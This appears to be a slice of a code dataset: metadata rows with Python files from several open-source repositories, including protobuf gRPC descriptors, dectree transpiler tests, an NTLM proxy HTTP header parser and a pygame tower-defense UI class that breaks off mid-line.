name='Subscribe',
full_name='router.Router.Subscribe',
index=2,
containing_service=None,
input_type=_SUBSCRIBEREQUEST,
output_type=_DOWNLINKMESSAGE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='Activate',
full_name='router.Router.Activate',
index=3,
containing_service=None,
input_type=_DEVICEACTIVATIONREQUEST,
output_type=_DEVICEACTIVATIONRESPONSE,
serialized_options=None,
),
])
_sym_db.RegisterServiceDescriptor(_ROUTER)
DESCRIPTOR.services_by_name['Router'] = _ROUTER
_ROUTERMANAGER = _descriptor.ServiceDescriptor(
name='RouterManager',
full_name='router.RouterManager',
file=DESCRIPTOR,
index=1,
serialized_options=None,
serialized_start=1982,
serialized_end=2127,
methods=[
_descriptor.MethodDescriptor(
name='GatewayStatus',
full_name='router.RouterManager.GatewayStatus',
index=0,
containing_service=None,
input_type=_GATEWAYSTATUSREQUEST,
output_type=_GATEWAYSTATUSRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetStatus',
full_name='router.RouterManager.GetStatus',
index=1,
containing_service=None,
input_type=_STATUSREQUEST,
output_type=_STATUS,
serialized_options=None,
),
])
_sym_db.RegisterServiceDescriptor(_ROUTERMANAGER)
DESCRIPTOR.services_by_name['RouterManager'] = _ROUTERMANAGER
# @@protoc_insertion_point(module_scope)
| 0 | 0 | 0 |
f5b8c671d74ac42322c9b17965495c9c4dd410c4 | 8,056 | py | Python | test/test_transpiler.py | forman/dectree | 867e6e905e647b9fa84ba120696228f56e727a40 | [
"MIT"
] | 3 | 2018-06-14T15:59:10.000Z | 2021-05-31T06:22:26.000Z | test/test_transpiler.py | forman/dectree | 867e6e905e647b9fa84ba120696228f56e727a40 | [
"MIT"
] | null | null | null | test/test_transpiler.py | forman/dectree | 867e6e905e647b9fa84ba120696228f56e727a40 | [
"MIT"
] | 1 | 2018-07-17T02:15:08.000Z | 2018-07-17T02:15:08.000Z | import os.path
import unittest
from io import StringIO
import numpy as np
from dectree.compiler import compile
from dectree.config import VECTORIZE_PROP
from dectree.transpiler import transpile
| 38.361905 | 105 | 0.627979 | import os.path
import unittest
from io import StringIO
import numpy as np
from dectree.compiler import compile
from dectree.config import VECTORIZE_PROP
from dectree.transpiler import transpile
def get_src(no1='false()', a='a', p1='P1', b='b', no2='NO'):
    """Build a small decision-tree definition in YAML for the tests.

    Each keyword argument substitutes one token in the template, so a
    single test can inject an invalid name or value at a specific spot
    and provoke the corresponding transpiler error.

    :param no1: membership function assigned to property ``"NO"`` of type P2
    :param a: name given to the (only) input variable; the rules always
        reference ``a``, so any other value makes ``a`` undefined
    :param p1: type name assigned to the input variable
    :param b: variable assigned in the first rule branch
    :param no2: property value assigned to ``b`` in the first rule branch
    :return: the formatted YAML source as a single string
    """
    # The template body is whitespace-sensitive YAML; only the {...}
    # placeholders below are substituted via str.format().
    code = \
        """
        types:
            P1:
                LOW: inv_ramp()
                HIGH: ramp()
            P2:
                "YES": true()
                "NO": {no1}
        inputs:
            - {a}: {p1}
        outputs:
            - b: P2
        rules:
            -
                - if a == LOW:
                    - {b} = {no2}
                - else:
                    - b = YES
        """
    return code.format(a=a, b=b, p1=p1, no1=no1, no2=no2)
class TranspileTest(unittest.TestCase):
def test_transpile_success(self):
src_file = StringIO(get_src())
out_file = StringIO()
transpile(src_file, out_file=out_file)
self.assertIsNotNone(out_file.getvalue())
def test_transpile_failures(self):
src_file = StringIO("")
with self.assertRaises(ValueError) as cm:
transpile(src_file)
self.assertEqual(str(cm.exception), 'Empty decision tree definition')
src_file = StringIO("")
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), 'Empty decision tree definition')
src_file = StringIO("types:\n ")
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), "Invalid decision tree definition: missing section "
"('types', 'inputs', 'outputs', 'rules') or all of them")
src_file = StringIO("types: null\ninputs: null\noutputs: null\nrules: null\n")
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), "Invalid decision tree definition: section 'types' is empty")
src_file = StringIO(get_src(a='u'))
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), 'Variable "a" is undefined')
src_file = StringIO(get_src(b='u'))
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), 'Variable "u" is undefined')
src_file = StringIO(get_src(no1='false'))
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), 'Illegal value for property "NO" of type "P2": False')
src_file = StringIO(get_src(p1='Radiance'))
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), 'Type "Radiance" of variable "a" is undefined')
src_file = StringIO(get_src(no2='Radiance'))
out_file = StringIO()
with self.assertRaises(ValueError) as cm:
transpile(src_file, out_file=out_file)
self.assertEqual(str(cm.exception), '"Radiance" is not a property of type "P2" of variable "b"')
def test_transpile_with_defaults(self):
src_file = os.path.join(os.path.dirname(__file__), 'dectree_test.yml')
out_file = os.path.join(os.path.dirname(__file__), 'dectree_test.py')
if os.path.exists(out_file):
os.remove(out_file)
transpile(src_file)
self.assertTrue(os.path.exists(out_file))
m = __import__('test.dectree_test')
self.assertTrue(hasattr(m, 'dectree_test'))
self.assertTrue(hasattr(m.dectree_test, 'Inputs'))
self.assertTrue(hasattr(m.dectree_test, 'Outputs'))
self.assertTrue(hasattr(m.dectree_test, 'apply_rules'))
inputs = m.dectree_test.Inputs()
outputs = m.dectree_test.Outputs()
inputs.glint = 0.2
inputs.radiance = 60.
m.dectree_test.apply_rules(inputs, outputs)
self.assertAlmostEqual(outputs.cloudy, 0.6)
self.assertAlmostEqual(outputs.certain, 1.0)
def test_compile_with_defaults(self):
src_file = os.path.join(os.path.dirname(__file__), 'dectree_test.yml')
apply_rules, Inputs, Outputs = compile(src_file)
self.assertIsNotNone(apply_rules)
self.assertIsNotNone(Inputs)
self.assertIsNotNone(Outputs)
inputs = Inputs()
outputs = Outputs()
inputs.glint = 0.2
inputs.radiance = 60.
apply_rules(inputs, outputs)
self.assertAlmostEqual(outputs.cloudy, 0.6)
self.assertAlmostEqual(outputs.certain, 1.0)
def test_transpile_parameterized(self):
src_file = os.path.join(os.path.dirname(__file__), 'dectree_test.yml')
out_file = os.path.join(os.path.dirname(__file__), 'dectree_test_p.py')
if os.path.exists(out_file):
os.remove(out_file)
transpile(src_file, out_file=out_file, parameterize=True)
self.assertTrue(os.path.exists(out_file))
m = __import__('test.dectree_test_p')
self.assertTrue(hasattr(m, 'dectree_test_p'))
self.assertTrue(hasattr(m.dectree_test_p, 'Inputs'))
self.assertTrue(hasattr(m.dectree_test_p, 'Outputs'))
self.assertTrue(hasattr(m.dectree_test_p, 'Params'))
self.assertTrue(hasattr(m.dectree_test_p, 'apply_rules'))
inputs = m.dectree_test_p.Inputs()
outputs = m.dectree_test_p.Outputs()
params = m.dectree_test_p.Params()
inputs.glint = 0.2
inputs.radiance = 60.
m.dectree_test_p.apply_rules(inputs, outputs, params)
self.assertAlmostEqual(outputs.cloudy, 0.6)
self.assertAlmostEqual(outputs.certain, 1.0)
def test_compile_parameterized(self):
src_file = os.path.join(os.path.dirname(__file__), 'dectree_test.yml')
apply_rules, Inputs, Outputs, Params = compile(src_file, parameterize=True)
self.assertIsNotNone(apply_rules)
self.assertIsNotNone(Inputs)
self.assertIsNotNone(Outputs)
self.assertIsNotNone(Params)
inputs = Inputs()
outputs = Outputs()
params = Params()
inputs.glint = 0.2
inputs.radiance = 60.
apply_rules(inputs, outputs, params)
self.assertAlmostEqual(outputs.cloudy, 0.6)
self.assertAlmostEqual(outputs.certain, 1.0)
    def test_transpile_vectorized(self):
        """transpile(vectorize=VECTORIZE_PROP) yields rules that accept numpy arrays."""
        src_file = os.path.join(os.path.dirname(__file__), 'dectree_test.yml')
        out_file = os.path.join(os.path.dirname(__file__), 'dectree_test_v.py')
        # Start from a clean slate so the assertTrue below proves transpile wrote it.
        if os.path.exists(out_file):
            os.remove(out_file)
        transpile(src_file, out_file=out_file, vectorize=VECTORIZE_PROP)
        self.assertTrue(os.path.exists(out_file))
        # __import__ returns the top-level package; the submodule hangs off it.
        m = __import__('test.dectree_test_v')
        self.assertTrue(hasattr(m, 'dectree_test_v'))
        self.assertTrue(hasattr(m.dectree_test_v, 'Inputs'))
        self.assertTrue(hasattr(m.dectree_test_v, 'Outputs'))
        self.assertTrue(hasattr(m.dectree_test_v, 'apply_rules'))
        inputs = m.dectree_test_v.Inputs()
        outputs = m.dectree_test_v.Outputs()
        # Element-wise evaluation: each index is an independent sample.
        inputs.glint = np.array([0.2, 0.3])
        inputs.radiance = np.array([60.0, 10.0])
        m.dectree_test_v.apply_rules(inputs, outputs)
        np.testing.assert_almost_equal(outputs.cloudy, np.array([0.6, 0.0]))
        np.testing.assert_almost_equal(outputs.certain, np.array([1.0, 1.0]))
def eval_func(f, x):
    """Evaluate a generated function body on *x*.

    *f* is a zero-argument callable returning Python source text for a
    function body (the body may reference the parameter ``x``).  The body
    is wrapped into a ``def y(x):`` definition, exec'd, and ``y(x)`` is
    returned.

    Args:
        f: callable returning the body source as a string.
        x: argument passed to the generated function.

    Returns:
        Whatever the generated body returns for ``x``.
    """
    body = f()
    # Indent every body line one level under the generated def.
    code_lines = ["def y(x):"] + ['    ' + line for line in body.split('\n')]
    code = '\n'.join(code_lines)
    local_vars = {}
    exec(code, None, local_vars)
    y = local_vars['y']
    return y(x)
| 7,582 | 18 | 257 |
e8959ae2201ff8ee23aaa916b0857726fe02cb73 | 11,281 | py | Python | MODULES/PROXY/lib/http_header.py | roadkillsanta/JAPY | 1a5383d7fc3a1c08c689f609cdcbb7d58fb84956 | [
"Apache-2.0"
] | 1 | 2016-10-03T23:00:44.000Z | 2016-10-03T23:00:44.000Z | MODULES/PROXY/lib/http_header.py | roadkillsanta/JAPY | 1a5383d7fc3a1c08c689f609cdcbb7d58fb84956 | [
"Apache-2.0"
] | null | null | null | MODULES/PROXY/lib/http_header.py | roadkillsanta/JAPY | 1a5383d7fc3a1c08c689f609cdcbb7d58fb84956 | [
"Apache-2.0"
] | null | null | null | # This file is part of 'NTLM Authorization Proxy Server'
# Copyright 2001 Dmitry A. Rozmanov <dima@xenon.spb.ru>
#
# NTLM APS is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# NTLM APS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the sofware; see the file COPYING. If not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
import string, urlparse
http_debug_file_name = 'http.debug'
#-----------------------------------------------------------------------
# tests client's header for correctness
def test_client_http_header(header_str):
""
request = string.split(header_str, '\012')[0]
parts = string.split(request)
# we have to have at least 3 words in the request
# poor check
if len(parts) < 3:
return 0
else:
return 1
#-----------------------------------------------------------------------
# tests server's response header for correctness
def test_server_http_header(header_str):
""
response = string.split(header_str, '\012')[0]
parts = string.split(response)
# we have to have at least 2 words in the response
# poor check
if len(parts) < 2:
return 0
else:
return 1
#-----------------------------------------------------------------------
def extract_http_header_str(buffer):
    """Split *buffer* into ``(header_str, rest_str)``.

    ``header_str`` is the complete message head including its terminating
    blank line, or ``''`` when no complete, plausible head is present yet
    (in which case ``rest_str`` is the untouched buffer).
    Modernized from Python-2-only ``string.*`` helper calls to ``str``
    methods so the function runs under both Python 2 and 3.
    """
    # let's remove possible leading newlines
    t = buffer.lstrip()
    # searching for the RFC header's end (CRLF CRLF)
    delimiter = '\015\012\015\012'
    header_end = t.find(delimiter)
    if header_end < 0:
        # may be it is a defective header made by junkbuster (bare LF LF)
        delimiter = '\012\012'
        header_end = t.find(delimiter)
    if header_end >= 0:
        # we have found it, possibly
        ld = len(delimiter)
        header_str = t[0:header_end + ld]
        # Let's check if it is a proper header
        if test_server_http_header(header_str) or test_client_http_header(header_str):
            # if yes then split the buffer after the head
            if (header_end + ld) >= len(t):
                rest_str = ''
            else:
                rest_str = t[header_end + ld:]
        else:
            # if not then leave the buffer as it is.
            # NOTE: if there is junk before the real header we will never
            # find that header -- till timeout, probably. Not a great plan.
            header_str = ''
            rest_str = buffer
    else:
        # there is no complete header in the buffer yet
        header_str = ''
        rest_str = buffer
    return (header_str, rest_str)
#-----------------------------------------------------------------------
def extract_server_header(buffer):
    """Try to split a server response head off *buffer*.

    Returns ``(HTTP_SERVER_HEAD or None, remaining-data-string)``.
    """
    header_str, rest_str = extract_http_header_str(buffer)
    header_obj = HTTP_SERVER_HEAD(header_str) if header_str else None
    return (header_obj, rest_str)
#-----------------------------------------------------------------------
def extract_client_header(buffer):
    """Try to split a client request head off *buffer*.

    Returns ``(HTTP_CLIENT_HEAD or None, remaining-data-string)``.
    """
    header_str, rest_str = extract_http_header_str(buffer)
    header_obj = HTTP_CLIENT_HEAD(header_str) if header_str else None
    return (header_obj, rest_str)
#-----------------------------------------------------------------------
def capitalize_value_name(str):
    """Return the canonical HTTP capitalization of a header name.

    Example: ``'content-type'`` -> ``'Content-Type'``.

    NOTE: the parameter name shadows the builtin ``str``; it is kept
    unchanged for interface compatibility with existing callers.
    Modernized from Python-2-only ``string.*`` helpers to ``str`` methods
    so the function runs under both Python 2 and 3.
    """
    return '-'.join(part.capitalize() for part in str.split('-'))
#-----------------------------------------------------------------------
# some helper classes
#-----------------------------------------------------------------------
class HTTP_HEAD:
    """Parsed HTTP message head.

    Splits a raw request/response head into ``fields`` (the three tokens
    of the first line), ``params`` (lower-cased header name -> list of
    values) and ``order_list`` (header names in first-seen order, used to
    reproduce the head's layout on output).

    Modernized from Python-2-only idioms (``string.*`` helpers,
    ``dict.has_key``, bare ``except``) to forms valid on both Python 2
    and 3; behavior is unchanged.
    """
    #-------------------------------
    def __init__(self, head_str):
        """Parse the raw head text *head_str*."""
        self.head_source = head_str
        self.params = None
        self.fields = None
        self.order_list = []
        head_str = head_str.strip()
        records = head_str.split('\012')
        # Dealing with the request/response line: split into exactly three
        # fields, keeping everything after the second token as one string.
        t = records[0].strip().split()
        fields = t[:2] + [' '.join(t[2:])]
        self.fields = [field.strip() for field in fields]
        # Dealing with params: one "Name: value" record per remaining line.
        params = {}
        order_list = []
        for record in records[1:]:
            parts = record.strip().split(':', 1)
            pname = parts[0].strip().lower()
            if pname not in params:
                params[pname] = []
                order_list.append(pname)
            try:
                params[pname].append(parts[1].strip())
            except IndexError:
                # the record had no ':' separator -- log it and keep going
                msg = "ERROR: Exception in head parsing. ValueName: '%s'" % pname
                self.debug(msg)
        self.params = params
        self.order_list = order_list
    #-------------------------------
    def debug(self, message):
        """Best-effort append of *message* plus the raw head to the debug file."""
        try:
            with open(http_debug_file_name, 'a') as f:
                f.write(message)
                f.write('\n=====\n')
                f.write(self.head_source)
        except IOError:
            # Logging must never break request handling.
            # TODO: keep a persistent file handle (or use logging) instead.
            pass
    #-------------------------------
    def copy(self):
        """Return an independent deep copy of this head."""
        import copy
        return copy.deepcopy(self)
    #-------------------------------
    def get_param_values(self, param_name):
        """Return the list of values stored for *param_name* ([] if absent)."""
        return self.params.get(param_name.lower(), [])
    #-------------------------------
    def del_param(self, param_name):
        """Drop all values of *param_name* (its slot in order_list is kept)."""
        self.params.pop(param_name.lower(), None)
    #-------------------------------
    def has_param(self, param_name):
        """Return whether *param_name* currently has stored values."""
        return param_name.lower() in self.params
    #-------------------------------
    def add_param_value(self, param_name, value):
        """Append *value* under *param_name*, registering the name on first use."""
        param_name = param_name.lower()
        if param_name not in self.params:
            self.params[param_name] = []
        if param_name not in self.order_list:
            self.order_list.append(param_name)
        self.params[param_name].append(value)
    #-------------------------------
    def replace_param_value(self, param_name, value):
        """Replace all values of *param_name* with the single *value*."""
        self.del_param(param_name)
        self.add_param_value(param_name, value)
    #-------------------------------
    def __repr__(self, delimiter='\n'):
        """Render the head as LF-terminated text; 'Cookie' headers go last.

        ``delimiter`` is unused but kept for interface compatibility.
        """
        res = ' '.join(self.fields) + '\n'
        cookies = ''
        for name in self.order_list:
            if name in self.params:
                for value in self.params[name]:
                    line = capitalize_value_name(name) + ': ' + value + '\n'
                    if name == 'cookie':
                        cookies += line
                    else:
                        res += line
        return res + cookies + '\n'
    #-------------------------------
    def send(self, socket):
        """Write the head to *socket* with CRLF line endings.

        Returns 1 on success, 0 on any send failure.
        """
        res = ' '.join(self.fields) + '\015\012'
        cookies = ''
        for name in self.order_list:
            if name in self.params:
                for value in self.params[name]:
                    line = capitalize_value_name(name) + ': ' + value + '\015\012'
                    if name == 'cookie':
                        cookies += line
                    else:
                        res += line
        res = res + cookies + '\015\012'
        # NOTE: sending self.head_source verbatim broke MSN Messenger in
        # 0.9.5/0.9.7; the re-rendered form above is what 0.9.1 used.
        try:
            socket.send(res)
            return 1
        except Exception:
            return 0
#-----------------------------------------------------------------------
#-----------------------------------------------------------------------
| 30.991758 | 92 | 0.503413 | # This file is part of 'NTLM Authorization Proxy Server'
# Copyright 2001 Dmitry A. Rozmanov <dima@xenon.spb.ru>
#
# NTLM APS is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# NTLM APS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the sofware; see the file COPYING. If not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
import string, urlparse
http_debug_file_name = 'http.debug'
#-----------------------------------------------------------------------
# tests client's header for correctness
def test_client_http_header(header_str):
""
request = string.split(header_str, '\012')[0]
parts = string.split(request)
# we have to have at least 3 words in the request
# poor check
if len(parts) < 3:
return 0
else:
return 1
#-----------------------------------------------------------------------
# tests server's response header for correctness
def test_server_http_header(header_str):
""
response = string.split(header_str, '\012')[0]
parts = string.split(response)
# we have to have at least 2 words in the response
# poor check
if len(parts) < 2:
return 0
else:
return 1
#-----------------------------------------------------------------------
def extract_http_header_str(buffer):
    """Split *buffer* into ``(header_str, rest_str)``.

    ``header_str`` is the complete message head including its terminating
    blank line, or ``''`` when no complete, plausible head is present yet
    (in which case ``rest_str`` is the untouched buffer).
    Modernized from Python-2-only ``string.*`` helper calls to ``str``
    methods so the function runs under both Python 2 and 3.
    """
    # let's remove possible leading newlines
    t = buffer.lstrip()
    # searching for the RFC header's end (CRLF CRLF)
    delimiter = '\015\012\015\012'
    header_end = t.find(delimiter)
    if header_end < 0:
        # may be it is a defective header made by junkbuster (bare LF LF)
        delimiter = '\012\012'
        header_end = t.find(delimiter)
    if header_end >= 0:
        # we have found it, possibly
        ld = len(delimiter)
        header_str = t[0:header_end + ld]
        # Let's check if it is a proper header
        if test_server_http_header(header_str) or test_client_http_header(header_str):
            # if yes then split the buffer after the head
            if (header_end + ld) >= len(t):
                rest_str = ''
            else:
                rest_str = t[header_end + ld:]
        else:
            # if not then leave the buffer as it is.
            # NOTE: if there is junk before the real header we will never
            # find that header -- till timeout, probably. Not a great plan.
            header_str = ''
            rest_str = buffer
    else:
        # there is no complete header in the buffer yet
        header_str = ''
        rest_str = buffer
    return (header_str, rest_str)
#-----------------------------------------------------------------------
def extract_server_header(buffer):
    """Try to split a server response head off *buffer*.

    Returns ``(HTTP_SERVER_HEAD or None, remaining-data-string)``.
    """
    header_str, rest_str = extract_http_header_str(buffer)
    header_obj = HTTP_SERVER_HEAD(header_str) if header_str else None
    return (header_obj, rest_str)
#-----------------------------------------------------------------------
def extract_client_header(buffer):
    """Try to split a client request head off *buffer*.

    Returns ``(HTTP_CLIENT_HEAD or None, remaining-data-string)``.
    """
    header_str, rest_str = extract_http_header_str(buffer)
    header_obj = HTTP_CLIENT_HEAD(header_str) if header_str else None
    return (header_obj, rest_str)
#-----------------------------------------------------------------------
def capitalize_value_name(str):
    """Return the canonical HTTP capitalization of a header name.

    Example: ``'content-type'`` -> ``'Content-Type'``.

    NOTE: the parameter name shadows the builtin ``str``; it is kept
    unchanged for interface compatibility with existing callers.
    Modernized from Python-2-only ``string.*`` helpers to ``str`` methods
    so the function runs under both Python 2 and 3.
    """
    return '-'.join(part.capitalize() for part in str.split('-'))
#-----------------------------------------------------------------------
# some helper classes
#-----------------------------------------------------------------------
class HTTP_HEAD:
    """Parsed HTTP message head.

    Splits a raw request/response head into ``fields`` (the three tokens
    of the first line), ``params`` (lower-cased header name -> list of
    values) and ``order_list`` (header names in first-seen order, used to
    reproduce the head's layout on output).

    Modernized from Python-2-only idioms (``string.*`` helpers,
    ``dict.has_key``, bare ``except``) to forms valid on both Python 2
    and 3; behavior is unchanged.
    """
    #-------------------------------
    def __init__(self, head_str):
        """Parse the raw head text *head_str*."""
        self.head_source = head_str
        self.params = None
        self.fields = None
        self.order_list = []
        head_str = head_str.strip()
        records = head_str.split('\012')
        # Dealing with the request/response line: split into exactly three
        # fields, keeping everything after the second token as one string.
        t = records[0].strip().split()
        fields = t[:2] + [' '.join(t[2:])]
        self.fields = [field.strip() for field in fields]
        # Dealing with params: one "Name: value" record per remaining line.
        params = {}
        order_list = []
        for record in records[1:]:
            parts = record.strip().split(':', 1)
            pname = parts[0].strip().lower()
            if pname not in params:
                params[pname] = []
                order_list.append(pname)
            try:
                params[pname].append(parts[1].strip())
            except IndexError:
                # the record had no ':' separator -- log it and keep going
                msg = "ERROR: Exception in head parsing. ValueName: '%s'" % pname
                self.debug(msg)
        self.params = params
        self.order_list = order_list
    #-------------------------------
    def debug(self, message):
        """Best-effort append of *message* plus the raw head to the debug file."""
        try:
            with open(http_debug_file_name, 'a') as f:
                f.write(message)
                f.write('\n=====\n')
                f.write(self.head_source)
        except IOError:
            # Logging must never break request handling.
            # TODO: keep a persistent file handle (or use logging) instead.
            pass
    #-------------------------------
    def copy(self):
        """Return an independent deep copy of this head."""
        import copy
        return copy.deepcopy(self)
    #-------------------------------
    def get_param_values(self, param_name):
        """Return the list of values stored for *param_name* ([] if absent)."""
        return self.params.get(param_name.lower(), [])
    #-------------------------------
    def del_param(self, param_name):
        """Drop all values of *param_name* (its slot in order_list is kept)."""
        self.params.pop(param_name.lower(), None)
    #-------------------------------
    def has_param(self, param_name):
        """Return whether *param_name* currently has stored values."""
        return param_name.lower() in self.params
    #-------------------------------
    def add_param_value(self, param_name, value):
        """Append *value* under *param_name*, registering the name on first use."""
        param_name = param_name.lower()
        if param_name not in self.params:
            self.params[param_name] = []
        if param_name not in self.order_list:
            self.order_list.append(param_name)
        self.params[param_name].append(value)
    #-------------------------------
    def replace_param_value(self, param_name, value):
        """Replace all values of *param_name* with the single *value*."""
        self.del_param(param_name)
        self.add_param_value(param_name, value)
    #-------------------------------
    def __repr__(self, delimiter='\n'):
        """Render the head as LF-terminated text; 'Cookie' headers go last.

        ``delimiter`` is unused but kept for interface compatibility.
        """
        res = ' '.join(self.fields) + '\n'
        cookies = ''
        for name in self.order_list:
            if name in self.params:
                for value in self.params[name]:
                    line = capitalize_value_name(name) + ': ' + value + '\n'
                    if name == 'cookie':
                        cookies += line
                    else:
                        res += line
        return res + cookies + '\n'
    #-------------------------------
    def send(self, socket):
        """Write the head to *socket* with CRLF line endings.

        Returns 1 on success, 0 on any send failure.
        """
        res = ' '.join(self.fields) + '\015\012'
        cookies = ''
        for name in self.order_list:
            if name in self.params:
                for value in self.params[name]:
                    line = capitalize_value_name(name) + ': ' + value + '\015\012'
                    if name == 'cookie':
                        cookies += line
                    else:
                        res += line
        res = res + cookies + '\015\012'
        # NOTE: sending self.head_source verbatim broke MSN Messenger in
        # 0.9.5/0.9.7; the re-rendered form above is what 0.9.1 used.
        try:
            socket.send(res)
            return 1
        except Exception:
            return 0
#-----------------------------------------------------------------------
class HTTP_SERVER_HEAD(HTTP_HEAD):
    """HTTP response head: fields are [version, status-code, reason-phrase]."""
    #-------------------------------
    def get_http_version(self):
        """Return the HTTP version token of the response line (e.g. 'HTTP/1.0')."""
        return self.fields[0]
    #-------------------------------
    def get_http_code(self):
        """Return the status code of the response line, as a string."""
        return self.fields[1]
    #-------------------------------
    def get_http_message(self):
        """Return the reason phrase of the response line."""
        return self.fields[2]
#-----------------------------------------------------------------------
class HTTP_CLIENT_HEAD(HTTP_HEAD):
    """HTTP request head: fields are [method, url, version]."""
    #-------------------------------
    def get_http_version(self):
        """Return the HTTP version token of the request line."""
        return self.fields[2]
    #-------------------------------
    def get_http_method(self):
        """Return the request method (GET, POST, ...)."""
        return self.fields[0]
    #-------------------------------
    def get_http_url(self):
        """Return the request URL exactly as the client sent it."""
        return self.fields[1]
    #-------------------------------
    def set_http_url(self, new_url):
        """Overwrite the URL field of the request line."""
        self.fields[1] = new_url
    #-------------------------------
    # There is some problem with www request header...
    # not all servers want to answer to requests with full url in request
    # but want have net location in 'Host' value and path in url.
    def make_right_header(self):
        """Rewrite an absolute-URL request into Host-header + path form."""
        url_tuple = urlparse.urlparse(self.get_http_url())
        net_location = url_tuple[1]
        self.replace_param_value('Host', net_location)
        # rebuild the URL with empty scheme/netloc, i.e. just path?query#frag
        path = urlparse.urlunparse(tuple(['', ''] + list(url_tuple[2:])))
        self.set_http_url(path)
    #-------------------------------
    def get_http_server(self):
        """Return ``(host, port)`` the request is addressed to.

        Falls back to the 'Host' header, then to 'localhost', when the URL
        carries no network location; the default port is 80.
        """
        # trying to get host from url
        url_tuple = urlparse.urlparse(self.get_http_url())
        net_location = url_tuple[1]
        # if there was no host in url then get it from 'Host' value
        if not net_location:
            # NOTE(review): [0] raises IndexError when no 'Host' header is
            # present -- confirm callers always guarantee one.
            net_location = self.get_param_values('Host')[0]
            if not net_location:
                net_location = 'localhost'
        # trying to parse user:passwd@www.some.domain:8080
        # is it needed?
        if '@' in net_location:
            cred, net_location = string.split(net_location, '@')
        if ':' in net_location:
            server, port = string.split(net_location, ':')
            port = int(port)
        else:
            server = net_location
            port = 80
        return server, port
| 0 | 2,177 | 44 |
c98db0b3f4e375dd6550c7913eddb684658456a2 | 56 | py | Python | app/db/enums/__init__.py | maxzhenzhera/my_vocab_backend | 2e9f968374e0bc2fcc0ae40830ca40f3cf5754d1 | [
"MIT"
] | 1 | 2021-11-18T16:25:22.000Z | 2021-11-18T16:25:22.000Z | app/db/enums/__init__.py | Max-Zhenzhera/my_vocab_backend | f93d0c7c7f4a45fce47eb7ce74cfcda195b13a72 | [
"MIT"
] | null | null | null | app/db/enums/__init__.py | Max-Zhenzhera/my_vocab_backend | f93d0c7c7f4a45fce47eb7ce74cfcda195b13a72 | [
"MIT"
] | null | null | null | from .language import Language
__all__ = ['Language']
| 11.2 | 30 | 0.732143 | from .language import Language
__all__ = ['Language']
| 0 | 0 | 0 |
9b8d29dc80fd2145ebde1c69bcc20726150589e9 | 51 | py | Python | venv/lib/python3.9/site-packages/__init__.py | lyushher/YBrowser | 49ec6e5e60d645ea80d81860f77ca6b06d5e20aa | [
"MIT"
] | 9 | 2021-07-25T22:45:52.000Z | 2021-11-13T03:39:05.000Z | venv/lib/python3.9/site-packages/__init__.py | lyushher/YBrowser | 49ec6e5e60d645ea80d81860f77ca6b06d5e20aa | [
"MIT"
] | null | null | null | venv/lib/python3.9/site-packages/__init__.py | lyushher/YBrowser | 49ec6e5e60d645ea80d81860f77ca6b06d5e20aa | [
"MIT"
] | null | null | null | from . import scraper
from .browser import Browser
| 17 | 28 | 0.803922 | from . import scraper
from .browser import Browser
| 0 | 0 | 0 |
83a9506e461a3c6e6df00f8d73bbeae769352b0b | 4,765 | py | Python | src/ui.py | PlayFrog/frog-td | 8e9c5aa5276b3a4ca2f743e7f833e083747ad3b4 | [
"MIT"
] | null | null | null | src/ui.py | PlayFrog/frog-td | 8e9c5aa5276b3a4ca2f743e7f833e083747ad3b4 | [
"MIT"
] | 9 | 2021-10-08T00:03:46.000Z | 2021-10-21T01:35:26.000Z | src/ui.py | PlayFrog/frog-td | 8e9c5aa5276b3a4ca2f743e7f833e083747ad3b4 | [
"MIT"
] | null | null | null | import pygame as pg
import constants
from state import GameState
from tower import Tower
| 41.798246 | 109 | 0.612802 | import pygame as pg
import constants
from state import GameState
from tower import Tower
class UI:
def __init__(self, screen: pg.Surface, fonts: list[pg.font.Font]):
self.screen = screen
self.screen.fill('black')
self.fonts = fonts
self.show_instructions = False
self.warning = None
def display_information_panel(self, state: GameState, available_coins: int,
rounds_complete: int):
info_panel_surf = pg.Surface(
(constants.SCREEN_SIZE[0], constants.INFO_PANEL_HEIGHT))
padding = 4
coin_text = self.fonts[0].render(
f'Moedas disponíveis: {available_coins}', False, constants.COIN_COLOR)
info_panel_surf.blit(coin_text, (padding, padding))
game_mode_text = self.fonts[0].render(
f'Modo: {state}', False, constants.WHITE)
info_panel_surf.blit(
game_mode_text, (padding, constants.INFO_PANEL_HEIGHT // 2 + padding))
round_text = self.fonts[0].render(
f"Rounds completos: {rounds_complete}", False, constants.WHITE)
info_panel_surf.blit(
round_text, (constants.SCREEN_SIZE[0] -
(round_text.get_width() + padding), padding)
)
if self.warning:
warning_text = self.fonts[0].render(
self.warning, False, constants.RED)
info_panel_surf.blit(
warning_text, (constants.SCREEN_SIZE[0] - (
